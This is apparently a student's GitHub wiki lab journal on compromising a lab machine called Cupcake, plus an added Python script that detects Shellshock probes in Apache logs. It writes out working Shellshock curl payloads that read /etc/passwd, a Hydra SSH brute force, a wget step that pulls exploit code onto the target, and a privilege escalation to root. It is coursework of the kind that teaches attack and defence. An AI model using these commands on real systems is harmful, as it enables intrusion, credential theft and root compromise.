# Activity 4.1 Exploiting Cupcake

morgan-hanrahan/Tech-Journal GitHub Wiki

## Determining Versions of Services

To determine the version of the services running on the target system, you can use an Nmap scan. For this example we used:

```bash
sudo nmap -A 10.0.5.23
```

The -A flag turns on Nmap's extended scans, including service version detection, so the output reports the version of each service. In this case, we could determine the system was running OpenSSH 5.3 and Apache HTTPd 2.2.15.
## Parsing Nmap with nmaptocsv

First, install nmaptocsv using the following commands:

```bash
sudo apt update
sudo apt install python3-pip
sudo pip install nmaptocsv
```

Next, run the following commands to scan your target, save the grepable output and convert it to CSV:

```bash
TARGET=10.0.5.23; sudo nmap -sT -sV --top-ports=100 $TARGET -Pn -oG top100.txt
cat top100.txt
nmaptocsv -i top100.txt -d ','
```

Copy the output of the last command and paste it into a spreadsheet; the spreadsheet will then offer to split the comma-separated data into columns.
## Invoking Remote Code Execution

Command to output the contents of /etc/passwd:

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://10.0.5.23/cgi-bin/status
```

Command to output the code behind the status CGI:

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat status' bash -s :'' http://10.0.5.23/cgi-bin/status
```

Command to output the results of running ifconfig:

```bash
curl -H 'User-Agent: () { :; }; echo ; echo ; /sbin/ifconfig' bash -s :'' http://10.0.5.23/cgi-bin/status
```
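The requests above leave a recognisable trace in the web server's access log, which is where a defender would look for them. The Python below is an added example, not code from this journal: it parses Apache combined-format log lines (constructed samples embedded) and flags any request whose User-Agent or Referer carries the bash function-definition trigger used above (the Shellshock pattern), marking hits whose path is under /cgi-bin/, where a bash-backed CGI would actually execute the header.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" access-log line:
#   client - - [timestamp] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The trigger is a bash exported-function header, "() {", whose body is closed
# by "};". Whitespace inside the pattern varies between probes, so allow any.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{.*?\}\s*;')

# Constructed sample lines (not from a real server): the first is an ordinary
# browser request, the second and third carry the trigger in the User-Agent.
SAMPLE_LOG: List[str] = [
    '10.0.99.39 - - [10/Oct/2023:14:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.99.39 - - [10/Oct/2023:14:02:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 1843 "-" "() { :; }; echo ; echo ; /bin/cat /etc/passwd"',
    '10.0.99.39 - - [10/Oct/2023:14:02:20 +0000] "GET /index.html HTTP/1.1" 200 77 "-" "() { :;}; /sbin/ifconfig"',
]

def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_shellshock_probe(entry: Dict[str, str]) -> bool:
    """True if a logged header value contains the function-definition trigger."""
    return any(SHELLSHOCK_RE.search(entry[field]) for field in ("ua", "referer"))

def find_probes(lines: List[str]) -> List[Dict[str, object]]:
    """Return the suspicious requests; 'cgi' is True when the path is under
    /cgi-bin/, i.e. where a bash-backed CGI script would execute the header."""
    hits: List[Dict[str, object]] = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_shellshock_probe(entry):
            hits.append({"ip": entry["ip"], "path": entry["path"], "ua": entry["ua"],
                         "cgi": entry["path"].startswith("/cgi-bin/")})
    return hits

if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['path']} cgi={hit['cgi']} ua={hit['ua']!r}")
```

Lines that do not match the combined format are skipped rather than raising, so the function can be run over a whole access log as-is.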
## Generation of Password List & SSH Bruteforce

In the previous section, we were able to get the contents of /etc/passwd. By examining this information we can determine which users we might be able to access. When looking at these users, focus on the ones with a home directory under /home and ignore any user whose shell ends in nologin. From this information, we determined our target was samwise.

We had access to a compressed file titled 'rockyou.txt', which contained a list of possible passwords and random words. We decompressed this file using:

```bash
gzip -d rockyou.txt
```

From this list we ran the following command to put the entries that contained "samwise" into a new file:

```bash
cat /usr/share/wordlists/rockyou.txt | grep -i "samwise" >> passwdlist.txt
```

The passwdlist.txt file now contains a list of likely passwords for the target account, and we can now use a bruteforce attack against cupcake. For this example we used Hydra, a tool for testing a variety of passwords against a service. We can do this attack by running:

```bash
hydra -l samwise -P passwdlist.txt 10.0.5.23 -t 4 ssh
```

The result of this command will provide us with samwise's password. Now that we have both the username and password we can ssh in using:

```bash
ssh samwise@10.0.5.23
```
## Transferring Files

To transfer files between your machine and your target you run two commands. The first on your own machine:

```bash
python3 -m http.server 8084
```

- You can pick any high port number; it doesn't have to be 8084.

On the target's machine enter the following command:

```bash
wget http://10.0.99.39:8084/40839.c
```

- Replace the IP with your machine's IP and make sure the port is the same one from the previous command.
- This will fetch the 40839.c file from your machine and transfer it to the target.
## Compiling & Running Privilege Escalation

Now compile the exploit with `gcc 40839.c -o cow`. To fix the errors, add the flags `-l pthread -lcrypt`. Next you can run `./cow`. This should successfully back up /etc/passwd to /tmp/passwd.bak, and you can enter a new password. Then you can get to superuser using `su - firefart` and run commands with root privilege.
## Reflection
This activity was fairly easy to follow along with and troubleshoot minor errors. My group worked well together and anytime I got confused my group did a great job explaining it to me. After doing this activity, I am going to research more about different exploits and how to know which ones are best to use at my current level.